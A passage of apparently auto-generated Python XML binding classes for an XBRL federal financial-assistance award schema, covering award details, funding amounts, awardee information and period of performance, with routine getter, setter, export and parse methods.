def insert_awardingAgency_at(self, index, value): self.awardingAgency.insert(index, value)
def replace_awardingAgency_at(self, index, value): self.awardingAgency[index] = value
def get_fundingAgency(self): return self.fundingAgency
def set_fundingAgency(self, fundingAgency): self.fundingAgency = fundingAgency
def add_fundingAgency(self, value): self.fundingAgency.append(value)
def insert_fundingAgency_at(self, index, value): self.fundingAgency.insert(index, value)
def replace_fundingAgency_at(self, index, value): self.fundingAgency[index] = value
def get_awardingSubTierAgency(self): return self.awardingSubTierAgency
def set_awardingSubTierAgency(self, awardingSubTierAgency): self.awardingSubTierAgency = awardingSubTierAgency
def add_awardingSubTierAgency(self, value): self.awardingSubTierAgency.append(value)
def insert_awardingSubTierAgency_at(self, index, value): self.awardingSubTierAgency.insert(index, value)
def replace_awardingSubTierAgency_at(self, index, value): self.awardingSubTierAgency[index] = value
def get_fundingSubTierAgency(self): return self.fundingSubTierAgency
def set_fundingSubTierAgency(self, fundingSubTierAgency): self.fundingSubTierAgency = fundingSubTierAgency
def add_fundingSubTierAgency(self, value): self.fundingSubTierAgency.append(value)
def insert_fundingSubTierAgency_at(self, index, value): self.fundingSubTierAgency.insert(index, value)
def replace_fundingSubTierAgency_at(self, index, value): self.fundingSubTierAgency[index] = value
def get_highlyCompensatedOfficer(self): return self.highlyCompensatedOfficer
def set_highlyCompensatedOfficer(self, highlyCompensatedOfficer): self.highlyCompensatedOfficer = highlyCompensatedOfficer
def add_highlyCompensatedOfficer(self, value): self.highlyCompensatedOfficer.append(value)
def insert_highlyCompensatedOfficer_at(self, index, value): self.highlyCompensatedOfficer.insert(index, value)
def replace_highlyCompensatedOfficer_at(self, index, value): self.highlyCompensatedOfficer[index] = value
def get_catalogOfFederalDomesticAssistanceProgram(self): return self.catalogOfFederalDomesticAssistanceProgram
def set_catalogOfFederalDomesticAssistanceProgram(self, catalogOfFederalDomesticAssistanceProgram): self.catalogOfFederalDomesticAssistanceProgram = catalogOfFederalDomesticAssistanceProgram
def get_awardAmounts(self): return self.awardAmounts
def set_awardAmounts(self, awardAmounts): self.awardAmounts = awardAmounts
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.awardDescription is not None or
self.awardID is not None or
self.parentAwardID is not None or
self.modificationAmendmentNumber is not None or
self.recordType is not None or
self.typeOfAction is not None or
self.typeOfTransactionCode is not None or
self.awardeeInformation is not None or
self.primaryPlaceOfPerformance is not None or
self.periodOfPerformance is not None or
self.awardingAgency or
self.fundingAgency or
self.awardingSubTierAgency or
self.fundingSubTierAgency or
self.highlyCompensatedOfficer or
self.catalogOfFederalDomesticAssistanceProgram is not None or
self.awardAmounts is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='awardComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:award="http://www.xbrl.org/int/award/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='awardComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='awardComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='awardComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='awardComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.awardDescription is not None:
self.awardDescription.export(outfile, level, namespace_='award:', name_='awardDescription', pretty_print=pretty_print)
if self.awardID is not None:
self.awardID.export(outfile, level, namespace_='gen:', name_='awardID', pretty_print=pretty_print)
if self.parentAwardID is not None:
self.parentAwardID.export(outfile, level, namespace_='award:', name_='parentAwardID', pretty_print=pretty_print)
if self.modificationAmendmentNumber is not None:
self.modificationAmendmentNumber.export(outfile, level, namespace_='award:', name_='modificationAmendmentNumber', pretty_print=pretty_print)
if self.recordType is not None:
self.recordType.export(outfile, level, namespace_='award:', name_='recordType', pretty_print=pretty_print)
if self.typeOfAction is not None:
self.typeOfAction.export(outfile, level, namespace_='award:', name_='typeOfAction', pretty_print=pretty_print)
if self.typeOfTransactionCode is not None:
self.typeOfTransactionCode.export(outfile, level, namespace_='award:', name_='typeOfTransactionCode', pretty_print=pretty_print)
if self.awardeeInformation is not None:
self.awardeeInformation.export(outfile, level, namespace_='finassist:', name_='awardeeInformation', pretty_print=pretty_print)
if self.primaryPlaceOfPerformance is not None:
self.primaryPlaceOfPerformance.export(outfile, level, namespace_='award:', name_='primaryPlaceOfPerformance', pretty_print=pretty_print)
if self.periodOfPerformance is not None:
self.periodOfPerformance.export(outfile, level, namespace_='finassist:', name_='periodOfPerformance', pretty_print=pretty_print)
for awardingAgency_ in self.awardingAgency:
awardingAgency_.export(outfile, level, namespace_='award:', name_='awardingAgency', pretty_print=pretty_print)
for fundingAgency_ in self.fundingAgency:
fundingAgency_.export(outfile, level, namespace_='award:', name_='fundingAgency', pretty_print=pretty_print)
for awardingSubTierAgency_ in self.awardingSubTierAgency:
awardingSubTierAgency_.export(outfile, level, namespace_='award:', name_='awardingSubTierAgency', pretty_print=pretty_print)
for fundingSubTierAgency_ in self.fundingSubTierAgency:
fundingSubTierAgency_.export(outfile, level, namespace_='award:', name_='fundingSubTierAgency', pretty_print=pretty_print)
for highlyCompensatedOfficer_ in self.highlyCompensatedOfficer:
highlyCompensatedOfficer_.export(outfile, level, namespace_='award:', name_='highlyCompensatedOfficer', pretty_print=pretty_print)
if self.catalogOfFederalDomesticAssistanceProgram is not None:
self.catalogOfFederalDomesticAssistanceProgram.export(outfile, level, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceProgram', pretty_print=pretty_print)
if self.awardAmounts is not None:
self.awardAmounts.export(outfile, level, namespace_='finassist:', name_='awardAmounts', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'awardDescription':
obj_ = stringItemType.factory()
obj_.build(child_)
self.awardDescription = obj_
obj_.original_tagname_ = 'awardDescription'
elif nodeName_ == 'awardID':
obj_ = stringItemType.factory()
obj_.build(child_)
self.awardID = obj_
obj_.original_tagname_ = 'awardID'
elif nodeName_ == 'parentAwardID':
obj_ = stringItemType.factory()
obj_.build(child_)
self.parentAwardID = obj_
obj_.original_tagname_ = 'parentAwardID'
elif nodeName_ == 'modificationAmendmentNumber':
obj_ = stringItemType.factory()
obj_.build(child_)
self.modificationAmendmentNumber = obj_
obj_.original_tagname_ = 'modificationAmendmentNumber'
elif nodeName_ == 'recordType':
obj_ = recordTypeItemType.factory()
obj_.build(child_)
self.recordType = obj_
obj_.original_tagname_ = 'recordType'
elif nodeName_ == 'typeOfAction':
obj_ = typeOfActionItemType.factory()
obj_.build(child_)
self.typeOfAction = obj_
obj_.original_tagname_ = 'typeOfAction'
elif nodeName_ == 'typeOfTransactionCode':
obj_ = typeOfTransactionCodeItemType.factory()
obj_.build(child_)
self.typeOfTransactionCode = obj_
obj_.original_tagname_ = 'typeOfTransactionCode'
elif nodeName_ == 'awardeeInformation':
obj_ = awardeeInformationComplexType.factory()
obj_.build(child_)
self.awardeeInformation = obj_
obj_.original_tagname_ = 'awardeeInformation'
elif nodeName_ == 'primaryPlaceOfPerformance':
obj_ = addressComplexType.factory()
obj_.build(child_)
self.primaryPlaceOfPerformance = obj_
obj_.original_tagname_ = 'primaryPlaceOfPerformance'
elif nodeName_ == 'periodOfPerformance':
obj_ = periodOfPerformanceComplexType.factory()
obj_.build(child_)
self.periodOfPerformance = obj_
obj_.original_tagname_ = 'periodOfPerformance'
elif nodeName_ == 'awardingAgency':
obj_ = agencyComplexType.factory()
obj_.build(child_)
self.awardingAgency.append(obj_)
obj_.original_tagname_ = 'awardingAgency'
elif nodeName_ == 'fundingAgency':
obj_ = agencyComplexType.factory()
obj_.build(child_)
self.fundingAgency.append(obj_)
obj_.original_tagname_ = 'fundingAgency'
elif nodeName_ == 'awardingSubTierAgency':
obj_ = agencyComplexType.factory()
obj_.build(child_)
self.awardingSubTierAgency.append(obj_)
obj_.original_tagname_ = 'awardingSubTierAgency'
elif nodeName_ == 'fundingSubTierAgency':
obj_ = agencyComplexType.factory()
obj_.build(child_)
self.fundingSubTierAgency.append(obj_)
obj_.original_tagname_ = 'fundingSubTierAgency'
elif nodeName_ == 'highlyCompensatedOfficer':
obj_ = highlyCompensatedOfficerComplexType.factory()
obj_.build(child_)
self.highlyCompensatedOfficer.append(obj_)
obj_.original_tagname_ = 'highlyCompensatedOfficer'
elif nodeName_ == 'catalogOfFederalDomesticAssistanceProgram':
obj_ = catalogOfFederalDomesticAssistanceProgramComplexType.factory()
obj_.build(child_)
self.catalogOfFederalDomesticAssistanceProgram = obj_
obj_.original_tagname_ = 'catalogOfFederalDomesticAssistanceProgram'
elif nodeName_ == 'awardAmounts':
obj_ = awardAmountsComplexType.factory()
obj_.build(child_)
self.awardAmounts = obj_
obj_.original_tagname_ = 'awardAmounts'
# end class awardComplexType
class catalogOfFederalDomesticAssistanceProgramComplexType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, catalogOfFederalDomesticAssistanceTitle=None, catalogOfFederalDomesticAssistanceNumber=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.catalogOfFederalDomesticAssistanceTitle = catalogOfFederalDomesticAssistanceTitle
self.catalogOfFederalDomesticAssistanceNumber = catalogOfFederalDomesticAssistanceNumber
def factory(*args_, **kwargs_):
if catalogOfFederalDomesticAssistanceProgramComplexType.subclass:
return catalogOfFederalDomesticAssistanceProgramComplexType.subclass(*args_, **kwargs_)
else:
return catalogOfFederalDomesticAssistanceProgramComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_catalogOfFederalDomesticAssistanceTitle(self): return self.catalogOfFederalDomesticAssistanceTitle
def set_catalogOfFederalDomesticAssistanceTitle(self, catalogOfFederalDomesticAssistanceTitle): self.catalogOfFederalDomesticAssistanceTitle = catalogOfFederalDomesticAssistanceTitle
def get_catalogOfFederalDomesticAssistanceNumber(self): return self.catalogOfFederalDomesticAssistanceNumber
def set_catalogOfFederalDomesticAssistanceNumber(self, catalogOfFederalDomesticAssistanceNumber): self.catalogOfFederalDomesticAssistanceNumber = catalogOfFederalDomesticAssistanceNumber
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.catalogOfFederalDomesticAssistanceTitle is not None or
self.catalogOfFederalDomesticAssistanceNumber is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceProgramComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='catalogOfFederalDomesticAssistanceProgramComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceProgramComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceProgramComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceProgramComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.catalogOfFederalDomesticAssistanceTitle is not None:
self.catalogOfFederalDomesticAssistanceTitle.export(outfile, level, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceTitle', pretty_print=pretty_print)
if self.catalogOfFederalDomesticAssistanceNumber is not None:
self.catalogOfFederalDomesticAssistanceNumber.export(outfile, level, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceNumber', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'catalogOfFederalDomesticAssistanceTitle':
obj_ = stringItemType.factory()
obj_.build(child_)
self.catalogOfFederalDomesticAssistanceTitle = obj_
obj_.original_tagname_ = 'catalogOfFederalDomesticAssistanceTitle'
elif nodeName_ == 'catalogOfFederalDomesticAssistanceNumber':
obj_ = stringItemType.factory()
obj_.build(child_)
self.catalogOfFederalDomesticAssistanceNumber = obj_
obj_.original_tagname_ = 'catalogOfFederalDomesticAssistanceNumber'
# end class catalogOfFederalDomesticAssistanceProgramComplexType
class awardAmountsComplexType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, federalFundingAmount=None, totalFundingAmount=None, nonFederalFundingAmount=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.federalFundingAmount = federalFundingAmount
self.totalFundingAmount = totalFundingAmount
self.nonFederalFundingAmount = nonFederalFundingAmount
def factory(*args_, **kwargs_):
if awardAmountsComplexType.subclass:
return awardAmountsComplexType.subclass(*args_, **kwargs_)
else:
return awardAmountsComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_federalFundingAmount(self): return self.federalFundingAmount
def set_federalFundingAmount(self, federalFundingAmount): self.federalFundingAmount = federalFundingAmount
def get_totalFundingAmount(self): return self.totalFundingAmount
def set_totalFundingAmount(self, totalFundingAmount): self.totalFundingAmount = totalFundingAmount
def get_nonFederalFundingAmount(self): return self.nonFederalFundingAmount
def set_nonFederalFundingAmount(self, nonFederalFundingAmount): self.nonFederalFundingAmount = nonFederalFundingAmount
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.federalFundingAmount is not None or
self.totalFundingAmount is not None or
self.nonFederalFundingAmount is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='awardAmountsComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:award="http://www.xbrl.org/int/award/2006-10-25" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='awardAmountsComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='awardAmountsComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='awardAmountsComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='awardAmountsComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.federalFundingAmount is not None:
self.federalFundingAmount.export(outfile, level, namespace_='award:', name_='federalFundingAmount', pretty_print=pretty_print)
if self.totalFundingAmount is not None:
self.totalFundingAmount.export(outfile, level, namespace_='finassist:', name_='totalFundingAmount', pretty_print=pretty_print)
if self.nonFederalFundingAmount is not None:
self.nonFederalFundingAmount.export(outfile, level, namespace_='finassist:', name_='nonFederalFundingAmount', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'federalFundingAmount':
obj_ = amountItemType.factory()
obj_.build(child_)
self.federalFundingAmount = obj_
obj_.original_tagname_ = 'federalFundingAmount'
elif nodeName_ == 'totalFundingAmount':
obj_ = amountItemType.factory()
obj_.build(child_)
self.totalFundingAmount = obj_
obj_.original_tagname_ = 'totalFundingAmount'
elif nodeName_ == 'nonFederalFundingAmount':
obj_ = amountItemType.factory()
obj_.build(child_)
self.nonFederalFundingAmount = obj_
obj_.original_tagname_ = 'nonFederalFundingAmount'
# end class awardAmountsComplexType
class awardeeInformationComplexType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, businessType=None, awardeeLegalBusinessName=None, ultimateParentUniqueIdentifier=None, awardeeUniqueIdentifier=None, awardeeUniqueIdentifierSupplemental=None, ultimateParentLegalBusinessName=None, awardeeAddress=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.businessType = businessType
self.awardeeLegalBusinessName = awardeeLegalBusinessName
self.ultimateParentUniqueIdentifier = ultimateParentUniqueIdentifier
self.awardeeUniqueIdentifier = awardeeUniqueIdentifier
self.awardeeUniqueIdentifierSupplemental = awardeeUniqueIdentifierSupplemental
self.ultimateParentLegalBusinessName = ultimateParentLegalBusinessName
self.awardeeAddress = awardeeAddress
def factory(*args_, **kwargs_):
if awardeeInformationComplexType.subclass:
return awardeeInformationComplexType.subclass(*args_, **kwargs_)
else:
return awardeeInformationComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_businessType(self): return self.businessType
def set_businessType(self, businessType): self.businessType = businessType
def get_awardeeLegalBusinessName(self): return self.awardeeLegalBusinessName
def set_awardeeLegalBusinessName(self, awardeeLegalBusinessName): self.awardeeLegalBusinessName = awardeeLegalBusinessName
def get_ultimateParentUniqueIdentifier(self): return self.ultimateParentUniqueIdentifier
def set_ultimateParentUniqueIdentifier(self, ultimateParentUniqueIdentifier): self.ultimateParentUniqueIdentifier = ultimateParentUniqueIdentifier
def get_awardeeUniqueIdentifier(self): return self.awardeeUniqueIdentifier
def set_awardeeUniqueIdentifier(self, awardeeUniqueIdentifier): self.awardeeUniqueIdentifier = awardeeUniqueIdentifier
def get_awardeeUniqueIdentifierSupplemental(self): return self.awardeeUniqueIdentifierSupplemental
def set_awardeeUniqueIdentifierSupplemental(self, awardeeUniqueIdentifierSupplemental): self.awardeeUniqueIdentifierSupplemental = awardeeUniqueIdentifierSupplemental
def get_ultimateParentLegalBusinessName(self): return self.ultimateParentLegalBusinessName
def set_ultimateParentLegalBusinessName(self, ultimateParentLegalBusinessName): self.ultimateParentLegalBusinessName = ultimateParentLegalBusinessName
def get_awardeeAddress(self): return self.awardeeAddress
def set_awardeeAddress(self, awardeeAddress): self.awardeeAddress = awardeeAddress
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.businessType is not None or
self.awardeeLegalBusinessName is not None or
self.ultimateParentUniqueIdentifier is not None or
self.awardeeUniqueIdentifier is not None or
self.awardeeUniqueIdentifierSupplemental is not None or
self.ultimateParentLegalBusinessName is not None or
self.awardeeAddress is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='awardeeInformationComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:award="http://www.xbrl.org/int/award/2006-10-25" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='awardeeInformationComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='awardeeInformationComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='awardeeInformationComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='awardeeInformationComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.businessType is not None:
self.businessType.export(outfile, level, namespace_='award:', name_='businessType', pretty_print=pretty_print)
if self.awardeeLegalBusinessName is not None:
self.awardeeLegalBusinessName.export(outfile, level, namespace_='award:', name_='awardeeLegalBusinessName', pretty_print=pretty_print)
if self.ultimateParentUniqueIdentifier is not None:
self.ultimateParentUniqueIdentifier.export(outfile, level, namespace_='award:', name_='ultimateParentUniqueIdentifier', pretty_print=pretty_print)
if self.awardeeUniqueIdentifier is not None:
self.awardeeUniqueIdentifier.export(outfile, level, namespace_='award:', name_='awardeeUniqueIdentifier', pretty_print=pretty_print)
if self.awardeeUniqueIdentifierSupplemental is not None:
self.awardeeUniqueIdentifierSupplemental.export(outfile, level, namespace_='award:', name_='awardeeUniqueIdentifierSupplemental', pretty_print=pretty_print)
if self.ultimateParentLegalBusinessName is not None:
self.ultimateParentLegalBusinessName.export(outfile, level, namespace_='award:', name_='ultimateParentLegalBusinessName', pretty_print=pretty_print)
if self.awardeeAddress is not None:
self.awardeeAddress.export(outfile, level, namespace_='award:', name_='awardeeAddress', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'businessType':
obj_ = businessTypeItemType.factory()
obj_.build(child_)
self.businessType = obj_
obj_.original_tagname_ = 'businessType'
elif nodeName_ == 'awardeeLegalBusinessName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.awardeeLegalBusinessName = obj_
obj_.original_tagname_ = 'awardeeLegalBusinessName'
elif nodeName_ == 'ultimateParentUniqueIdentifier':
obj_ = integerItemType.factory()
obj_.build(child_)
self.ultimateParentUniqueIdentifier = obj_
obj_.original_tagname_ = 'ultimateParentUniqueIdentifier'
elif nodeName_ == 'awardeeUniqueIdentifier':
obj_ = integerItemType.factory()
obj_.build(child_)
self.awardeeUniqueIdentifier = obj_
obj_.original_tagname_ = 'awardeeUniqueIdentifier'
elif nodeName_ == 'awardeeUniqueIdentifierSupplemental':
obj_ = stringItemType.factory()
obj_.build(child_)
self.awardeeUniqueIdentifierSupplemental = obj_
obj_.original_tagname_ = 'awardeeUniqueIdentifierSupplemental'
elif nodeName_ == 'ultimateParentLegalBusinessName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.ultimateParentLegalBusinessName = obj_
obj_.original_tagname_ = 'ultimateParentLegalBusinessName'
elif nodeName_ == 'awardeeAddress':
obj_ = addressComplexType.factory()
obj_.build(child_)
self.awardeeAddress = obj_
obj_.original_tagname_ = 'awardeeAddress'
# end class awardeeInformationComplexType
class periodOfPerformanceComplexType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, periodOfPerformanceActionDate=None, periodOfPerformanceStartDate=None, periodOfPerformanceCurrentEndDate=None, periodOfPerformancePotentialEndDate=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.periodOfPerformanceActionDate = periodOfPerformanceActionDate
self.periodOfPerformanceStartDate = periodOfPerformanceStartDate
self.periodOfPerformanceCurrentEndDate = periodOfPerformanceCurrentEndDate
self.periodOfPerformancePotentialEndDate = periodOfPerformancePotentialEndDate
def factory(*args_, **kwargs_):
if periodOfPerformanceComplexType.subclass:
return periodOfPerformanceComplexType.subclass(*args_, **kwargs_)
else:
return periodOfPerformanceComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_periodOfPerformanceActionDate(self): return self.periodOfPerformanceActionDate
def set_periodOfPerformanceActionDate(self, periodOfPerformanceActionDate): self.periodOfPerformanceActionDate = periodOfPerformanceActionDate
def get_periodOfPerformanceStartDate(self): return self.periodOfPerformanceStartDate
def set_periodOfPerformanceStartDate(self, periodOfPerformanceStartDate): self.periodOfPerformanceStartDate = periodOfPerformanceStartDate
def get_periodOfPerformanceCurrentEndDate(self): return self.periodOfPerformanceCurrentEndDate
def set_periodOfPerformanceCurrentEndDate(self, periodOfPerformanceCurrentEndDate): self.periodOfPerformanceCurrentEndDate = periodOfPerformanceCurrentEndDate
def get_periodOfPerformancePotentialEndDate(self): return self.periodOfPerformancePotentialEndDate
def set_periodOfPerformancePotentialEndDate(self, periodOfPerformancePotentialEndDate): self.periodOfPerformancePotentialEndDate = periodOfPerformancePotentialEndDate
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.periodOfPerformanceActionDate is not None or
self.periodOfPerformanceStartDate is not None or
self.periodOfPerformanceCurrentEndDate is not None or
self.periodOfPerformancePotentialEndDate is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='periodOfPerformanceComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:award="http://www.xbrl.org/int/award/2006-10-25" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='periodOfPerformanceComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='periodOfPerformanceComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='periodOfPerformanceComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='periodOfPerformanceComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.periodOfPerformanceActionDate is not None:
self.periodOfPerformanceActionDate.export(outfile, level, namespace_='award:', name_='periodOfPerformanceActionDate', pretty_print=pretty_print)
if self.periodOfPerformanceStartDate is not None:
self.periodOfPerformanceStartDate.export(outfile, level, namespace_='award:', name_='periodOfPerformanceStartDate', pretty_print=pretty_print)
if self.periodOfPerformanceCurrentEndDate is not None:
self.periodOfPerformanceCurrentEndDate.export(outfile, level, namespace_='award:', name_='periodOfPerformanceCurrentEndDate', pretty_print=pretty_print)
if self.periodOfPerformancePotentialEndDate is not None:
self.periodOfPerformancePotentialEndDate.export(outfile, level, namespace_='award:', name_='periodOfPerformancePotentialEndDate', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'periodOfPerformanceActionDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.periodOfPerformanceActionDate = obj_
obj_.original_tagname_ = 'periodOfPerformanceActionDate'
elif nodeName_ == 'periodOfPerformanceStartDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.periodOfPerformanceStartDate = obj_
obj_.original_tagname_ = 'periodOfPerformanceStartDate'
elif nodeName_ == 'periodOfPerformanceCurrentEndDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.periodOfPerformanceCurrentEndDate = obj_
